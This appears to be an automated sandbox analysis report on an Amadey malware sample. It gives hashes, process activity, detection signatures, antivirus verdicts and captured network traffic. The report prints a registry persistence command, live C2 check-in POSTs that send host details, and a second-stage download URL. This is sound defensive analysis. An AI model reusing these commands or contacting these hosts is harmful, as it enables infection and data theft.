  1.  
  2. * ID: 800
  3. * MalFamily: "Amadey"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_f3a4609666def1d9102913afea0bdd78.exe"
  8. * File Size: 434176
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "c059075babf0ce7b306718f6f2ae03a4d14a89970d875f85bd1fdcdeb25751f6"
  11. * MD5: "f3a4609666def1d9102913afea0bdd78"
  12. * SHA1: "ca9d917b207a945f4889b80b3b275b2721255b49"
  13. * SHA512: "837c60d895cb6aaa3bc9b53fd06f4986c6afcfb4f7075b645942a8c4eacb99ad982478b7fdca1b6b5858f6167948070d3aad11a5393e9eb3fef17adc34057400"
  14. * CRC32: "185B47AE"
  15. * SSDEEP: "6144:p7cOWf9SpYJjjfTQH3z680cmhE4Uy0fEmfnkDLOtCsa8DKnAd21jedguVFOQp:pB6SpQju7SDLOtCs6nAE1jQ"
  16.  
  17. * Process Execution:
  18. "e1gCq.exe",
  19. "e1gCq.exe",
  20. "kntd.exe",
  21. "kntd.exe",
  22. "reg.exe",
  23. "TIL13KLESDA.exe",
  24. "\u0570\u043b\u10e5\u10d0\u10e0\u10d7\u10e3\u10da\u10d8.exe",
  25. "svchost.exe",
  26. "services.exe",
  27. "lsass.exe"
  28.  
  29.  
  30. * Executed Commands:
  31. "c:\\programdata\\968b2ad0a1\\kntd.exe",
  32. "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\968b2ad0a1",
  33. "C:\\Users\\user\\AppData\\Local\\Temp\\TIL13KLESDA.exe",
  34. "\"C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe\"",
  35. "C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe ",
  36. "C:\\Windows\\system32\\svchost.exe",
  37. "C:\\Windows\\system32\\lsass.exe"
  38.  
  39.  
  40. * Signatures Detected:
  41.  
  42. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  43. "Details":
  44.  
  45.  
  46. "Description": "Behavioural detection: Executable code extraction",
  47. "Details":
  48.  
  49.  
  50. "Description": "Attempts to connect to a dead IP:Port (1 unique time)",
  51. "Details":
  52.  
  53. "IP_ioc": "212.42.121.51:80 (Kyrgyzstan)"
  54.  
  55.  
  56.  
  57.  
  58. "Description": "Creates RWX memory",
  59. "Details":
  60.  
  61.  
  62. "Description": "Reads data out of its own binary image",
  63. "Details":
  64.  
  65. "self_read": "process: e1gCq.exe, pid: 2692, offset: 0x00000000, length: 0x00033000"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "A process created a hidden window",
  71. "Details":
  72.  
  73. "Process": "e1gCq.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\e1gCq.exe"
  74.  
  75.  
  76. "Process": "kntd.exe -> c:\\programdata\\968b2ad0a1\\kntd.exe"
  77.  
  78.  
  79. "Process": "TIL13KLESDA.exe -> C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe"
  80.  
  81.  
  82.  
  83.  
  84. "Description": "Drops a binary and executes it",
  85. "Details":
  86.  
  87. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\TIL13KLESDA.exe"
  88.  
  89.  
  90. "binary": "C:\\programdata\\968b2ad0a1\\kntd.exe"
  91.  
  92.  
  93.  
  94.  
  95. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  96. "Details":
  97.  
  98. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  99.  
  100.  
  101. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  102.  
  103.  
  104. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  105.  
  106.  
  107. "suspicious_request_iocs": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php"
  108.  
  109.  
  110. "suspicious_request_iocs": "http://paqsource.com/till15/TIL13KLESDA.exe"
  111.  
  112.  
  113.  
  114.  
  115. "Description": "Performs some HTTP requests",
  116. "Details":
  117.  
  118. "url_iocs": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php"
  119.  
  120.  
  121. "url_iocs": "http://paqsource.com/till15/TIL13KLESDA.exe"
  122.  
  123.  
  124.  
  125.  
  126. "Description": "Uses Windows utilities for basic functionality",
  127. "Details":
  128.  
  129. "command": "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\968b2ad0a1"
  130.  
  131.  
  132.  
  133.  
  134. "Description": "Behavioural detection: Injection (Process Hollowing)",
  135. "Details":
  136.  
  137. "Injection": "e1gCq.exe(1732) -> e1gCq.exe(2692)"
  138.  
  139.  
  140.  
  141.  
  142. "Description": "Executed a process and injected code into it, probably while unpacking",
  143. "Details":
  144.  
  145. "Injection": "e1gCq.exe(1732) -> e1gCq.exe(2692)"
  146.  
  147.  
  148.  
  149.  
  150. "Description": "Behavioural detection: Injection (inter-process)",
  151. "Details":
  152.  
  153.  
  154. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  155. "Details":
  156.  
  157. "Process": "kntd.exe tried to sleep 2399 seconds, actually delayed analysis time by 0 seconds"
  158.  
  159.  
  160.  
  161.  
  162. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  163. "Details":
  164.  
  165. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 542984 times"
  166.  
  167.  
  168.  
  169.  
  170. "Description": "Likely virus infection of existing system binary",
  171. "Details":
  172.  
  173. "file": "c:\\programdata\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe"
  174.  
  175.  
  176.  
  177.  
  178. "Description": "Attempts to identify installed AV products by installation directory",
  179. "Details":
  180.  
  181. "file": "C:\\ProgramData\\AVAST Software"
  182.  
  183.  
  184. "file": "C:\\ProgramData\\Avira"
  185.  
  186.  
  187. "file": "C:\\ProgramData\\Kaspersky Lab"
  188.  
  189.  
  190. "file": "C:\\ProgramData\\ESET"
  191.  
  192.  
  193. "file": "C:\\ProgramData\\Panda Security"
  194.  
  195.  
  196. "file": "C:\\ProgramData\\Bitdefender"
  197.  
  198.  
  199. "file": "C:\\ProgramData\\AVG"
  200.  
  201.  
  202. "file": "C:\\ProgramData\\Doctor Web"
  203.  
  204.  
  205.  
  206.  
  207. "Description": "File has been identified by 28 Antiviruses on VirusTotal as malicious",
  208. "Details":
  209.  
  210. "MicroWorld-eScan": "Gen:Variant.Graftor.632360"
  211.  
  212.  
  213. "FireEye": "Generic.mg.f3a4609666def1d9"
  214.  
  215.  
  216. "Cylance": "Unsafe"
  217.  
  218.  
  219. "SUPERAntiSpyware": "Trojan.Agent/Gen-TrickBot"
  220.  
  221.  
  222. "K7AntiVirus": "Trojan ( 00556fa91 )"
  223.  
  224.  
  225. "K7GW": "Trojan ( 00556fa91 )"
  226.  
  227.  
  228. "Arcabit": "Trojan.Graftor.D9A628"
  229.  
  230.  
  231. "Symantec": "Packed.Generic.516"
  232.  
  233.  
  234. "APEX": "Malicious"
  235.  
  236.  
  237. "Kaspersky": "Trojan-Downloader.Win32.Deyma.ano"
  238.  
  239.  
  240. "BitDefender": "Gen:Variant.Graftor.632360"
  241.  
  242.  
  243. "Rising": "Trojan.Generic@ML.89 (RDML:KU/SGocyZ85q4pjWJhL/kg)"
  244.  
  245.  
  246. "Ad-Aware": "Gen:Variant.Graftor.632360"
  247.  
  248.  
  249. "Emsisoft": "Gen:Variant.Graftor.632360 (B)"
  250.  
  251.  
  252. "F-Secure": "Trojan.TR/AD.Zlob.enzyp"
  253.  
  254.  
  255. "TrendMicro": "TROJ_GEN.R050C0WI219"
  256.  
  257.  
  258. "Avira": "TR/AD.Zlob.enzyp"
  259.  
  260.  
  261. "ZoneAlarm": "Trojan-Downloader.Win32.Deyma.ano"
  262.  
  263.  
  264. "GData": "Gen:Variant.Graftor.632360"
  265.  
  266.  
  267. "ALYac": "Gen:Variant.Graftor.632360"
  268.  
  269.  
  270. "MAX": "malware (ai score=86)"
  271.  
  272.  
  273. "Panda": "Trj/GdSda.A"
  274.  
  275.  
  276. "ESET-NOD32": "a variant of Win32/Kryptik.GWAS"
  277.  
  278.  
  279. "TrendMicro-HouseCall": "TROJ_GEN.R050C0WI219"
  280.  
  281.  
  282. "Ikarus": "Trojan.Win32.Trickbot"
  283.  
  284.  
  285. "Fortinet": "W32/GenKryptik.DRLU!tr"
  286.  
  287.  
  288. "AVG": "Win32:TrojanX-gen Trj"
  289.  
  290.  
  291. "Avast": "Win32:TrojanX-gen Trj"
  292.  
  293.  
  294.  
  295.  
  296. "Description": "Creates a copy of itself",
  297. "Details":
  298.  
  299. "copy": "C:\\programdata\\968b2ad0a1\\kntd.exe"
  300.  
  301.  
  302.  
  303.  
  304. "Description": "Created network traffic indicative of malicious activity",
  305. "Details":
  306.  
  307. "signature": "ET TROJAN Amadey CnC Check-In"
  308.  
  309.  
  310.  
  311.  
  312.  
  313. * Started Service:
  314. "KeyIso"
  315.  
  316.  
  317. * Mutexes:
  318. "Global\\838B6C9EB27932960"
  319.  
  320.  
  321. * Modified Files:
  322. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
  323. "C:\\ProgramData\\0",
  324. "C:\\programdata\\968b2ad0a1\\kntd.exe",
  325. "C:\\programdata\\968b2ad0a1\\kntd.exe:Zone.Identifier",
  326. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\TIL13KLESDA1.exe",
  327. "C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe",
  328. "C:\\Windows\\sysnative\\LogFiles\\Scm\\9cdf079f-d488-47e0-8840-9a3500f1bbe4"
  329.  
  330.  
  331. * Deleted Files:
  332.  
  333. * Modified Registry Keys:
  334. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
  335.  
  336.  
  337. * Deleted Registry Keys:
  338.  
  339. * DNS Communications:
  340.  
  341. "type": "A",
  342. "request": "paqsource.com",
  343. "answers":
  344.  
  345. "data": "212.42.121.51",
  346. "type": "A"
  347.  
  348.  
  349.  
  350.  
  351.  
  352. * Domains:
  353.  
  354. "ip": "212.42.121.51",
  355. "domain": "paqsource.com"
  356.  
  357.  
  358.  
  359. * Network Communication - ICMP:
  360.  
  361. * Network Communication - HTTP:
  362.  
  363. "count": 34,
  364. "body": "id=2818818937&sd=4cf169&vs=1.41&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  365. "uri": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  366. "user-agent": "",
  367. "method": "POST",
  368. "host": "51.15.202.245",
  369. "version": "1.1",
  370. "path": "/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  371. "data": "POST /1a2d9426-59f2-4ca2-a640-25633c660631/index.php HTTP/1.1\r\nHost: 51.15.202.245\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=4cf169&vs=1.41&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  372. "port": 80
  373.  
  374.  
  375. "count": 1,
  376. "body": "",
  377. "uri": "http://paqsource.com/till15/TIL13KLESDA.exe",
  378. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  379. "method": "GET",
  380. "host": "paqsource.com",
  381. "version": "1.1",
  382. "path": "/till15/TIL13KLESDA.exe",
  383. "data": "GET /till15/TIL13KLESDA.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: paqsource.com\r\nConnection: Keep-Alive\r\n\r\n",
  384. "port": 80
  385.  
  386.  
  387. "count": 1,
  388. "body": "d1=1000028001&",
  389. "uri": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  390. "user-agent": "",
  391. "method": "POST",
  392. "host": "51.15.202.245",
  393. "version": "1.1",
  394. "path": "/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
  395. "data": "POST /1a2d9426-59f2-4ca2-a640-25633c660631/index.php HTTP/1.1\r\nHost: 51.15.202.245\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 14\r\n\r\nd1=1000028001&",
  396. "port": 80
  397.  
  398.  
  399.  
  400. * Network Communication - SMTP:
  401.  
  402. * Network Communication - Hosts:
  403.  
  404. "country_name": "France",
  405. "ip": "51.15.202.245",
  406. "inaddrarpa": "",
  407. "hostname": ""
  408.  
  409.  
  410. "country_name": "Kyrgyzstan",
  411. "ip": "212.42.121.51",
  412. "inaddrarpa": "",
  413. "hostname": "paqsource.com"
  414.  
  415.  
  416.  
  417. * Network Communication - IRC: